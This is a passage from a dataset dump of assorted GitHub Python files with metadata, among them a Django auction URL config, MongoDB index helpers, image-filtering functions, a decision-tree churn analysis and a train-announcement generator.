lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(EdFiAcademicWeek, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, EdFiAcademicWeek):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, EdFiAcademicWeek):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"xmarcosx/edfi-notebook","sub_path":"src/v5.3/resources/swagger_client/models/ed_fi_academic_week.py","file_name":"ed_fi_academic_week.py","file_ext":"py","file_size_in_byte":10060,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"40829868506","text":"import json\nimport logging\nimport os\n# import time\n# import uuid\nimport boto3\n\n# from utils import decimalencoder\nfrom utils.todoTableClass import todoTableClass\n\n\nif os.environ[\"ENVIRONMENT\"] == \"LOCAL\":\n dynamodb = None\nelse:\n dynamodb = boto3.resource(\"dynamodb\")\n\n\n# Agrega un nuevo elemento a la lista\ndef create(event, context):\n data = json.loads(event['body'])\n\n if 'text' not in data:\n logging.error(\"Validation Failed\")\n raise Exception(\"Couldn't create the todo item.\")\n\n mytable = todoTableClass(dynamodb)\n item = mytable.put_todo(data['text'])\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(item)\n }\n return response\n","repo_name":"jruizcampos/todo-list-aws","sub_path":"src/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17691935898","text":"from typing import List, Optional\n\n# Must be imported in this way to allow for easy patching with mongomock\nimport pymongo\nfrom flask_pymongo import PyMongo\nfrom pydantic import BaseModel\nfrom pymongo.errors import ConnectionFailure\n\n__all__ = (\n \"flask_mongo\",\n \"check_mongo_connection\",\n \"create_default_indices\",\n \"_get_active_mongo_client\",\n \"insert_pydantic_model_fork_safe\",\n)\n\nflask_mongo = PyMongo()\n\"\"\"This is the primary database interface used by the Flask app.\"\"\"\n\n\ndef insert_pydantic_model_fork_safe(model: BaseModel, collection: str) -> str:\n \"\"\"Inserts a Pydantic model into chosen collection, returning the inserted ID.\"\"\"\n return (\n get_database()[collection]\n .insert_one(model.dict(by_alias=True, exclude_none=True))\n .inserted_id\n )\n\n\ndef _get_active_mongo_client(timeoutMS: int = 1000) -> pymongo.MongoClient:\n \"\"\"Returns a `MongoClient` for the configured `MONGO_URI`,\n raising a `RuntimeError` if not available.\n\n Parameters:\n timeoutMS: Value to use for the MongoDB timeouts (connect and server select)\n in milliseconds\n\n Returns:\n The active MongoClient, already connected.\n\n \"\"\"\n from pydatalab.config import CONFIG\n from pydatalab.logger import LOGGER\n\n try:\n return pymongo.MongoClient(\n CONFIG.MONGO_URI,\n connectTimeoutMS=timeoutMS,\n serverSelectionTimeoutMS=timeoutMS,\n connect=True,\n )\n except ConnectionFailure as exc:\n LOGGER.critical(f\"Unable to connect to MongoDB at {CONFIG.MONGO_URI}\")\n raise RuntimeError from exc\n\n\ndef get_database() -> pymongo.database.Database:\n \"\"\"Returns the configured database.\"\"\"\n return _get_active_mongo_client().get_database()\n\n\ndef check_mongo_connection() -> None:\n \"\"\"Checks that the configured MongoDB is available and returns a\n `pymongo.MongoClient` for the configured `MONGO_URI`.\n\n Raises:\n RuntimeError:\n If the configured MongoDB is not available.\n\n \"\"\"\n try:\n cli = _get_active_mongo_client()\n cli.list_database_names()\n except Exception as exc:\n raise RuntimeError from exc\n\n\ndef create_default_indices(\n client: Optional[pymongo.MongoClient] = None,\n background: bool = False,\n) -> List[str]:\n \"\"\"Creates indices for the configured or passed MongoClient.\n\n Indexes created are:\n - A text index over all string fields in item models,\n - An index over item type,\n - A unique index over `item_id` and `refcode`.\n - A text index over user names and identities.\n\n Parameters:\n background: If true, indexes will be created as background jobs.\n\n Returns:\n A list of messages returned by each `create_index` call.\n\n \"\"\"\n from pydatalab.logger import LOGGER\n from pydatalab.models import ITEM_MODELS\n\n if client is None:\n client = _get_active_mongo_client()\n db = client.get_database()\n\n item_fts_fields = set()\n for model in ITEM_MODELS:\n schema = ITEM_MODELS[model].schema()\n for f in schema[\"properties\"]:\n if schema[\"properties\"][f].get(\"type\") == \"string\":\n item_fts_fields.add(f)\n\n def create_or_recreate_text_index(collection, fields, weights):\n fts_index_name = f\"{collection.name} full-text search\"\n\n def create_fts():\n return collection.create_index(\n [(k, pymongo.TEXT) for k in fields],\n name=fts_index_name,\n weights=weights,\n )\n\n try:\n return create_fts()\n except pymongo.errors.OperationFailure:\n collection.drop_index(fts_index_name)\n return create_fts()\n\n ret = []\n\n ret += create_or_recreate_text_index(\n db.items,\n item_fts_fields,\n weights={\"refcode\": 3, \"item_id\": 3, \"name\": 3, \"chemform\": 3},\n )\n\n ret += create_or_recreate_text_index(\n db.collections,\n [\"collection_id\", \"title\", \"description\"],\n weights={\"collection_id\": 3, \"title\": 3, \"description\": 3},\n )\n\n ret += db.items.create_index(\"type\", name=\"item type\", background=background)\n ret += db.items.create_index(\n \"item_id\", unique=True, name=\"unique item ID\", background=background\n )\n ret += db.items.create_index(\n \"refcode\", unique=True, name=\"unique refcode\", background=background\n )\n ret += db.items.create_index(\"last_modified\", name=\"last modified\", background=background)\n\n user_fts_fields = {\"identities.name\", \"display_name\"}\n\n ret += db.users.create_index(\n [\n (\"identities.identifier\", pymongo.ASCENDING),\n (\"identities.identity_type\", pymongo.ASCENDING),\n ],\n unique=True,\n name=\"unique user identifiers\",\n background=background,\n )\n try:\n ret += db.users.create_index(\n [(k, pymongo.TEXT) for k in user_fts_fields],\n name=\"user identities full-text search\",\n background=background,\n )\n except Exception as exc:\n LOGGER.warning(\"Failed to create text index: %s\", exc)\n\n return ret\n","repo_name":"elbee99/datalab","sub_path":"pydatalab/pydatalab/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"16652689364","text":"import csv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pyproj import Transformer\nfrom scipy.spatial.transform import Rotation as R\n\n\ndef dist(a, b):\n return np.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n\ndef nmea_to_srs(coordinate: tuple, transformer):\n coordinate_4326 = [int(x/100) + (x - int(x / 100) * 100) / 60 for x in coordinate]\n return np.array(transformer.transform(coordinate_4326[0], coordinate_4326[1]))\n \ndef get_scale_and_coord(filepath, img_offset, img_step):\n gnss_file = pd.read_csv(filepath)\n\n # GPS coordinates are transformed to 'EPSG:25832' to get distances in meters.\n srs_in = 'EPSG:4326'\n srs_out = 'EPSG:25832'\n transformer = Transformer.from_crs(srs_in, srs_out)\n\n timestamps = [row.time for _, row in gnss_file.iterrows()]\n coordinates = [nmea_to_srs((float(row.lat_nmea), float(row.lon_nmea)), transformer) for _, row in gnss_file.iterrows()]\n\n timestamps = timestamps[img_offset::img_step]\n coordinates = coordinates[img_offset::img_step]\n\n first_coord = coordinates[0]\n\n scales = []\n last_new_idx = 0\n velocity = 0\n for i, coord in enumerate(coordinates):\n if (coord[0] != coordinates[last_new_idx][0]).all():\n velocity = sum(abs(coord - coordinates[last_new_idx])) / (timestamps[i] - timestamps[last_new_idx])\n #velocity = np.linalg.norm((coord - coordinates[last_new_idx])) / (timestamps[i] - timestamps[last_new_idx])\n last_new_idx = i\n \n if i > 0:\n scales.append(velocity * (timestamps[i] - timestamps[i - 1])) \n return scales, first_coord\n\ndef get_orientations(imu_filepath, gnss_filepath):\n imu_file = pd.read_csv(imu_filepath)\n gnss_file = pd.read_csv(gnss_filepath)\n\n timestamps = [row.time for _, row in gnss_file.iterrows()]\n data = np.array([[row.time, -row.yaw_pitch_roll_0 + 123, row.yaw_pitch_roll_1, row.yaw_pitch_roll_2] for _, row in imu_file.iterrows()])\n yprs = []\n for time in timestamps:\n idx = np.argmin(abs(data[:,0] - time))\n yprs.append(data[idx,1:])\n\n orientations = [R.from_euler('yxz', ypr, degrees=True).as_matrix() for ypr in yprs]\n return orientations\n\ndef save_route_as_csv(route, filename, first_coord):\n x = [-pose[0, 3] for pose in route]\n z = [-pose[2, 3] for pose in route]\n if filename.split('.')[-1] != 'csv': filename = filename + '.csv'\n with open(filename, mode='w') as route_file:\n file_writer = csv.writer(route_file, delimiter=',')\n file_writer.writerow(['x','y'])\n for i in range(len(x)):\n file_writer.writerow([first_coord[0] + z[i], first_coord[1] + x[i]])\n\ndef save_2droute_as_csv(route, filename, first_coord):\n x = [-pose[0] for pose in route]\n z = [-pose[1] for pose in route]\n if filename.split('.')[-1] != 'csv': filename = filename + '.csv'\n with open(filename, mode='w') as route_file:\n file_writer = csv.writer(route_file, delimiter=',')\n file_writer.writerow(['x','y'])\n for i in range(len(x)):\n file_writer.writerow([first_coord[0] + z[i], first_coord[1] + x[i]])\n\n\ndef plot_route(poses, plot_type = 'scatter', projection = '2d', first_coord=[0, 0, 0]):\n fig = plt.figure()\n if projection == '3d':\n ax = fig.gca(projection=projection)\n else:\n ax = fig.gca()\n\n ax.set_xlabel('X')\n ax.set_ylabel('Z')\n ax.ticklabel_format(useOffset=False, style='plain')\n\n x = [-pose[0, 3] + first_coord[2] for pose in poses]\n y = [pose[1, 3] + first_coord[1] for pose in poses]\n z = [-pose[2, 3] + first_coord[0] for pose in poses]\n\n if projection == '3d':\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n\n interval = max(max(x) - min(x), max(y) - min(y), max(z) - min(z))\n x_mean, y_mean, z_mean = np.mean(x), np.mean(y), np.mean(z)\n ax.set_xlim3d([x_mean - interval, x_mean + interval])\n ax.set_ylim3d([y_mean - interval, y_mean + interval])\n ax.set_zlim3d([z_mean - interval, z_mean + interval])\n \n if plot_type == 'quiver':\n orientations = [np.dot(np.array([0, 0, -1]), pose[:3,:3]) for pose in poses]\n x_rot = [rot[0] for rot in orientations]\n y_rot = [rot[1] for rot in orientations]\n z_rot = [rot[2] for rot in orientations]\n ax.quiver(x, y, z, x_rot, y_rot, z_rot, length=1, normalize=True)\n else:\n ax.scatter(x, y, z, marker='o')\n else:\n ax.set_xlabel('Z')\n ax.set_ylabel('X')\n ax.set_aspect(1)\n ax.scatter(z, x, marker='o')\n \n plt.show()\n","repo_name":"OliverVea/jayde16_olvea16_masters_products","sub_path":"VisualOdometry/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17576803809","text":"'''\nAuthors\nLucas Yudi Sugi \t\t\t\tNumero USP: 9293251\nRicardo França Fernandes do Vale \t Numero USP: 9293477\n\nDiscipline\nSCC 0251 - Processamento de Imagens - 2018/1o sem - Prof. Moacir Ponti\n\nTitle\nApply the resize in an image\n'''\n\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport imageio\n\n#Size of mean filter applied in smoothing\nsizeMeanFilter = 3\n\n#Size of sobel filter applied in sharpening\nsizeSobelFilter = 3\n\n#Size of log filter applied in sharpening\nsizeLogFilter = 3\n\n#Sigma used in Log\nsigmaLog = 1.6\n\n#Parameter that is used in gamma adjustment\ngamma = 0.7\n\n#Parameter that us used in highBoost\nhighBoostParameter = 2\n\n'''\nImprove the enhancement of image and convert to grayscale using histogram equalizing\nimg: Image that we want to calculate\n'''\ndef histogramEqualizing(img):\n\n #Max pixel in image\n maxPixel = 256;\n \n #Creating the histogram for three channels\n histR = np.zeros(maxPixel,int)\n histG = np.zeros(maxPixel,int)\n histB = np.zeros(maxPixel,int)\n \n #Populating the channels\n for i in range(maxPixel):\n histR[i] = (img[:,:,0] == i).sum()\n histG[i] = (img[:,:,1] == i).sum()\n histB[i] = (img[:,:,2] == i).sum()\n \n #Accumulating pixels\n for i in range(1,maxPixel):\n histR[i] = histR[i] + histR[i-1]\n histG[i] = histG[i] + histG[i-1]\n histB[i] = histB[i] + histB[i-1]\n \n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n \n #Multiplicative factor\n mulFactor = (maxPixel-1)/(M*N)\n \n #New image that is equalized\n newImg = np.zeros((M,N,3), dtype=np.uint8)\n \n #Apply the histogram equalizer\n for i in range(maxPixel):\n sR = int(histR[i] * mulFactor)\n sG = int(histG[i] * mulFactor)\n sB = int(histB[i] * mulFactor)\n\n newImg[np.where(img[:,:,0]==i)] = sR\n newImg[np.where(img[:,:,1]==i)] = sG\n newImg[np.where(img[:,:,2]==i)] = sB\n \n return newImg\n\n'''\nImprove the enhancement of image using gamma adjustment\nimg: Image that we want to enhancement\n'''\ndef gammaAdjustment(img):\n \n #Computhes the gamma adjustment\n img = np.power(img,gamma)\n\n #Normalizing and convert\n img = np.uint8(((img-img.max())/(img.max()-img.min()))*255)\n\n return img\n\n'''\nApply the convolution in an image\nimg: Image that it will be used for convolution\nmask: Matrix with the mask that will be used for convolution\n'''\ndef convolution(img,mask):\n \n #Extrac color channel\n imgR = img[:,:,0]\n imgG = img[:,:,1]\n imgB = img[:,:,2]\n\n #Image in frequency domain\n imgR = np.fft.fft2(imgR)\n imgG = np.fft.fft2(imgG)\n imgB = np.fft.fft2(imgB)\n \n #Filter in frequency domain\n mask = np.fft.fft2(mask)\n\n #Apply the convolution\n imgR = np.multiply(mask,imgR)\n imgG = np.multiply(mask,imgG)\n imgB = np.multiply(mask,imgB)\n \n #Get the real part\n imgR = np.real(np.fft.ifft2(imgR))\n imgG = np.real(np.fft.ifft2(imgG))\n imgB = np.real(np.fft.ifft2(imgB))\n\n #Normalizing\n imgR = np.uint8(((imgR-imgR.min())/(imgR.max()-imgR.min()))*255)\n imgG = np.uint8(((imgG-imgG.min())/(imgG.max()-imgG.min()))*255)\n imgB = np.uint8(((imgB-imgB.min())/(imgB.max()-imgB.min()))*255)\n \n #Image with result\n imgResult = np.zeros([img.shape[0],img.shape[1],3],dtype=np.uint8)\n imgResult[:,:,0] = imgR\n imgResult[:,:,1] = imgG\n imgResult[:,:,2] = imgB\n\n return imgResult\n\n'''\nSmoothing the image with mean filter\nimg: Image that will be smoothed\n'''\ndef smoothing(img):\n\n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n\n #Creating mean filter\n meanFilter = np.zeros([M,N])\n for i in range(sizeMeanFilter):\n for j in range(sizeMeanFilter):\n meanFilter[i][j] = 1/(sizeMeanFilter*sizeMeanFilter)\n \n return convolution(img,meanFilter)\n\n'''\nApply the equation of log\nx: Coordinate 'x' that we use for calculate log\ny: Coordinate 'y' that we use for calculate log\n'''\ndef log(x,y):\n return (-1/(np.pi*np.power(sigmaLog,4))) * (1-((np.power(x,2)+np.power(y,2))/(2*np.power(sigmaLog,2))))* (np.exp((-np.power(x,2)-np.power(y,2))/(2*np.power(sigmaLog,2)))) \n\n'''\nSharpening with laplacian of gaussian\nimg: Image that we use to apply log\n'''\ndef laplacianOfGaussian(img):\n \n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n \n #Create filter\n laplacianFilter = np.zeros([M,N])\n\n #Region that we want to populate (Calculates the limit's image)\n a = (sizeLogFilter-1/2)\n b = (sizeLogFilter-1/2)\n\n #Populating mask\n for i in range(sizeLogFilter):\n for j in range(sizeLogFilter):\n laplacianFilter[i][j] = log(i-a,j-b) \n\n return convolution(img,laplacianFilter)\n\n'''\nSharpening with high boost\nimg: Image that we use to apply high boost\n'''\ndef highBoost(img):\n\n #Blur image\n tempImage = np.copy(img)\n tempImage= smoothing(tempImage)\n \n #Create mask\n mask = img-tempImage\n\n return np.uint8(highBoostParameter*mask)\n\n'''\nSharpening with sobel operator\nimg: Image that we use to apply the sobel operator\n'''\ndef sobel(img): \n \n #Dimension of image\n M = img.shape[0]\n N = img.shape[1]\n \n #Create the two filters\n Fx = np.zeros([M,N]) \n Fx[0][0] = Fx[2][0] = 1\n Fx[1][0] = 2\n Fx[0][2] = Fx[2][2] = -1\n Fx[1][2] = -2\n Fy = np.zeros([M,N])\n Fy[0:3,0:3] = np.transpose(Fx[0:3,0:3])\n \n #Apply convolution\n Fx = convolution(img,Fx)\n Fy = convolution(img,Fy)\n\n #Convert\n Fx = np.float64(Fx)\n Fy = np.float64(Fy)\n \n return np.uint8(np.sqrt(np.power(Fx,2) + np.power(Fy,2)))\n","repo_name":"ricardoffv/Processamento-de-Imagens_Projeto-Final","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13435266363","text":"from django.urls import path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"new_listing\", views.new_listing, name=\"new_listing\"),\n path(\"\", views.listing, name=\"listing\"),\n path(\"/watch\", views.watch, name=\"AddTo_watchlist\"),\n path(\"/unwatch\", views.unwatch, name=\"RemoveFrom_watchlist\"),\n path(\"myWatchlist\", views.myWatchlist, name=\"myWatchlist_url\"),\n path(\"/comment\", views.comment, name=\"addCommenturl\"),\n path(\"/bid\", views.bid, name=\"bidurl\"),\n path(\"/close\", views.closeAuction, name=\"closeurl\"),\n path(\"by_categories\", views.listings_by_categories, name=\"categoriesurl\"),\n path(\"by_categories/\", views.listings_by_category, name=\"categoryurl\"),\n path(\"won\", views.auctions_won, name=\"wonurl\"),\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n#below was coded for ImageField\n\n\n\n","repo_name":"robot180/commerce","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36868913616","text":"from mcpi.minecraft import Minecraft\nmc=Minecraft.create()\nimport time\nimport random\n\nx,y,z=mc.player.getPos()\n\n# pos=mc.player.getPos()\n# x,y,z=pos.x,pos.y,pos.z\n\ncount=0\nwhile count<5:\n \n x=x+random.randint(-2,2)\n y=y+random.randint(0,5)\n z=z+random.randint(-2,2)\n mc.postToChat(\"{},{},{}\".format(x,y,z))\n mc.player.setPos(x,y,z)\n print(count)\n count=count+1 \n time.sleep(1)\n ","repo_name":"newsteinking/workspace_backup","sub_path":"workspace_K/workspace_jihoon/python/python_minecraft/Learn to Program with Minecraft Code실습/chapter7-whileLoops/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22882314936","text":"import os\r\nimport pandas as pd \r\nfrom pydub import AudioSegment\r\nfrom gtts import gTTS\r\n\r\ndef textToSpeech(text,filename):\r\n mytext = str(text)\r\n language = 'hi'\r\n myobj = gTTS(text=mytext,lang=language,slow=False)\r\n myobj.save(filename)\r\n\r\n\r\ndef margeAudio(audios):\r\n combined = AudioSegment.empty()\r\n for audio in audios :\r\n combined += AudioSegment.from_mp3(audio)\r\n return combined\r\n\r\n \r\ndef generateSkeleton():\r\n '''generate krupaya dhyan dhejeya'''\r\n audio = AudioSegment.from_mp3('railway.mp3')\r\n\r\n # 1 generating Krypaya dhayan \r\n start = 19000\r\n finish = 23000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"1_annon.mp3\",format=\"mp3\")\r\n # 2 from city\r\n\r\n # 3 ke rasthe\r\n start = 29250\r\n finish = 29900\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"3_annon.mp3\",format=\"mp3\")\r\n # 4 to city \r\n\r\n # 5 ko jana avli \r\n start = 30500\r\n finish = 31500\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"5_annon.mp3\",format=\"mp3\")\r\n # 6,7 train number and name\r\n \r\n # 8 apani nertharith sami\r\n start = 32000\r\n finish = 33000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"8_annon.mp3\",format=\"mp3\") \r\n # 9 time\r\n \r\n # 10 platforn number per avage \r\n start = 37000\r\n finish = 38000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"10_annon.mp3\",format=\"mp3\")\r\n\r\n \r\n # 11 platform \r\n\r\n # 12 per sa jayagi \r\n start = 38500\r\n finish = 40000\r\n audioProcess = audio[start:finish]\r\n audioProcess.export(\"12_annon.mp3\",format=\"mp3\") \r\n\r\ndef generateAnnoun(filename):\r\n df = pd.read_excel(filename)\r\n print(df)\r\n for index,item in df.iterrows():\r\n # 2 from city generate\r\n textToSpeech(item['from'],'2_annon.mp3')\r\n\r\n # 4 to city generator\r\n textToSpeech(item['to'],'4_annon.mp3')\r\n\r\n # 6,7 train name and number\r\n textToSpeech(item['train_no'] ,'6_annon.mp3')\r\n textToSpeech(item['train_name'] ,'7_annon.mp3')\r\n\r\n # 9 time \r\n textToSpeech(item['time'],'9_annon.mp3')\r\n\r\n # 11 platform number\r\n textToSpeech(item['platform'],'11_annon.mp3')\r\n\r\n audio = [f\"{i}_annon.mp3\" for i in range(1,13)]\r\n\r\n anounouncement = margeAudio(audio)\r\n anounouncement.export(f\"announcement_{item['train_no']}_{index+1}.mp3\",format = \"mp3\")\r\n\r\nif __name__ == \"__main__\":\r\n print('Genrating Skeleton')\r\n generateSkeleton()\r\n print('Generating Announcemene')\r\n generateAnnoun('train_annon.xlsx')\r\n","repo_name":"jyothiprakashpanaik/indian-railway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4377786193","text":"import pandas as pd #импорт библиотек, которые потребуются.\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier #импортируем модель деревьев решений\nfrom io import StringIO\nfrom IPython.display import Image\nfrom scipy.stats import randint as randint\nfrom scipy.stats import uniform\n\n\n# Для блакнота\n#%matplotlib inline\n\nplt.style.use('ggplot')\nplt.rcParams['figure.figsize'] = (18,12)\n\ndf_churn = pd.read_csv('churn.csv')\n\n\ndef preproc(df_init): # объявляем функцию\n df_preproc = df_init.copy()\n\n df_preproc = df_preproc.drop(['State', 'Area Code', 'Phone'], axis=1) # удаляем малоинформативные столбцы\n\n df_preproc.loc[:, [\"Int'l Plan\", 'VMail Plan']] = \\\n df_preproc.loc[:, [\"Int'l Plan\", 'VMail Plan']].replace(\n {'no': 0, 'yes': 1}) # делаем замену занчений в указанных столбцах\n # на 0 и 1\n df_preproc.loc[:, 'Churn?'] = df_preproc.loc[:, 'Churn?'].replace(\n {'False.': 0, # аналогично делаем замену и в столбце 'Churn?'\n 'True.': 1})\n return df_preproc\n\ndf_preproc = df_churn.pipe(preproc) # обрабоатываем датафрейм при помощи функции, описанной выше.\n\nX, y = df_preproc.iloc[:, :-1].values, df_preproc.iloc[:, -1].values # разделяем датафрейм на два множества:\n# данные для обучения и ответы.\n\ntry:\n from sklearn.model_selection import validation_curve\nexcept ImportError:\n from sklearn.learning_curve import validation_curve\n\ntry:\n from sklearn.model_selection import StratifiedKFold\nexcept ImportError:\n from sklearn.cross_validation import StratifiedKFold\n\nmodel = DecisionTreeClassifier(random_state=123) # инициализируем модель\n\ncv = StratifiedKFold(n_splits=5, shuffle=True, random_state=132) #разбиваем наше множество на 5 частей и перемешиваем \"shuffle=True\"\n\ntrain_scores, valid_scores = validation_curve(model, X, y, #задаем параметры для валидационной кривой.\n 'max_depth', range(1, 20), # будем исследовать глубину дерева в диапазоне от 1 до 20\n cv=cv, scoring='roc_auc')\n\ntrain_score_mean = train_scores.mean(axis=1)\ntrain_score_std = train_scores.std(axis=1)\nvalid_scores_mean = valid_scores.mean(axis=1)\nvalid_scores_std = valid_scores.std(axis=1)\n\nplt.fill_between(range(1,20), train_score_mean-train_score_std, train_score_mean+train_score_std, color='b',\n interpolate=True, alpha=0.5,)\nplt.fill_between(range(1,20), valid_scores_mean-valid_scores_std, valid_scores_mean+valid_scores_std, color='r',\n interpolate=True, alpha=0.5)\n\nplt.plot(range(1,20), train_score_mean, c='b', lw=2)\nplt.plot(range(1,20), valid_scores_mean, c='r', lw=2)\n\nplt.xlabel('max depth')\nplt.ylabel('ROC AUC')\n\n\n\ntry:\n from sklearn.model_selection import RandomizedSearchCV # импортирует случайный поиск\nexcept ImportError:\n from sklearn.cross_validation import RandomizedSearchCV\n\nRND_SEED = 123\n\nparam_grid = { #зададим параметры по которым и будем осуществлять поиск\n 'criterion': ['gini', 'entropy'],\n 'max_depth': randint(2, 8),\n 'min_samples_leaf': randint(5, 10),\n 'class_weight': [None, 'balanced']}\n\ncv = StratifiedKFold(n_splits=5, random_state=123, shuffle=True)\n\nmodel = DecisionTreeClassifier(random_state=123)\nrandom_search = RandomizedSearchCV(model, param_distributions=param_grid, n_iter=200, n_jobs=-1,\n cv=cv, scoring='roc_auc', random_state=123)\n\nrandom_search.fit(X, y)\nbest_model = random_search.best_estimator_;\nbest_model #параметры наилучшей модели\n\nmodel = random_search.best_estimator_\nimp = model.feature_importances_\n\npd.Series(index=df_preproc.columns[:-1], data = imp).sort_values()\n\nprint(random_search.best_params_)#выведем наилучшие параметры\nprint(random_search.best_score_)#лучшее значение метрики","repo_name":"rushan-nazmiev/machineLearning","sub_path":"DecisionTree/index_churn.py","file_name":"index_churn.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36970923796","text":"#! /usr/bin/python3\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import MiniBatchKMeans\n\ndata = pd.read_csv('../train.csv')\nY = data['opened']\nX = data.columns.tolist()\nX.remove('opened')\nX.remove('open_time')\nX = data[X]\n\nY = Y.as_matrix()\nX = X.as_matrix()\n\nnp.savetxt('../data.txt', X)\nnp.savetxt('../label.txt', Y)\n","repo_name":"pin3da/data-science","sub_path":"final/src/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6591260847","text":"'''\nCreated on Mar 21, 2020\n\n@author: natehuang\n'''\nimport unittest\nimport csv\nimport numpy as np\nfrom ImpactModel.Regression import regression\nfrom numpy.testing._private.utils import assert_allclose\n\nclass Test(unittest.TestCase):\n\n def testRegression(self):\n np.random.seed(1)\n # create a fake eta and beta\n x = np.random.rand(2)\n # generate fake data\n with open('test_regression.csv', 'w', newline='\\n') as f:\n data_writer = csv.writer(f)\n for i in range(30):\n if i%10 == 0:\n data_writer.writerow(['Day%i'%(i//9), \n 'X[%i]'%(i//9), \n 'V[%i]'%(i//9), \n 'sigma[%i]'%(i//9), \n 'h[%i]'%(i//9)])\n else:\n generater1 = np.random.rand()\n generater2 = np.random.rand() + generater1\n s = np.random.rand()/100 + 0.01\n # write the fake data into csv\n data_writer.writerow([None, 1e9*generater1, 1e9*generater2, s, \n regression.impact_cost_fun(x, 1e9*generater1, 1e9*generater2, s, 0)])\n if i%10==9:\n data_writer.writerow([None, None, None, None, None])\n\n reg = regression(filepath = 'test_regression.csv')\n result = reg.compute_eta_beta(regression.impact_cost_fun)[0]\n assert_allclose(result, x, rtol=1e-5)\n \n # Output from assignment2_part1_input\n inputTest = regression(filepath = 'assignment2_part1_input.csv')\n r = inputTest.compute_eta_beta(regression.impact_cost_fun)[0]\n print('Choose day0 = 20070705, day1 = 20070802, day3 = 20070904')\n print('The regression result of assignment2_part1_input is:', r)\n ","repo_name":"nateehuang/AlgorTradingGithub","sub_path":"Homework2/ImpactModel/Test_Regression.py","file_name":"Test_Regression.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35344697743","text":"\"\"\"\nautobyteus/prompt/prompt_template.py\n\nThis module contains the PromptTemplate class, which represents a prompt that may contain various template variables.\n\nPromptTemplate class features:\n- The raw template string.\n- A list of associated PromptTemplateVariable instances.\n- A method to convert the prompt template to a dictionary representation for frontend communication.\n\"\"\"\n\nfrom autobyteus.prompt.prompt_template_variable import PromptTemplateVariable\n\n\nclass PromptTemplate:\n def __init__(self, template: str, variables: list[PromptTemplateVariable] = None):\n self.template = template\n self.variables = variables if variables is not None else []\n\n def to_dict(self) -> dict:\n \"\"\"\n Converts the PromptTemplate instance to a dictionary representation.\n\n Returns:\n dict: Dictionary representation of the PromptTemplate instance.\n \"\"\"\n return {\n \"template\": self.template,\n \"variables\": [variable.to_dict() for variable in self.variables]\n }\n \n def fill(self, values: dict) -> str:\n \"\"\"\n Fill the template using the provided values.\n\n Args:\n values (dict): Dictionary containing variable names as keys and their respective values.\n\n Returns:\n str: The filled template string.\n \n Raises:\n KeyError: If a required variable is missing from the provided values.\n \"\"\"\n try:\n return self.template.format(**values)\n except KeyError as e:\n raise KeyError(f\"Missing value for template variable: 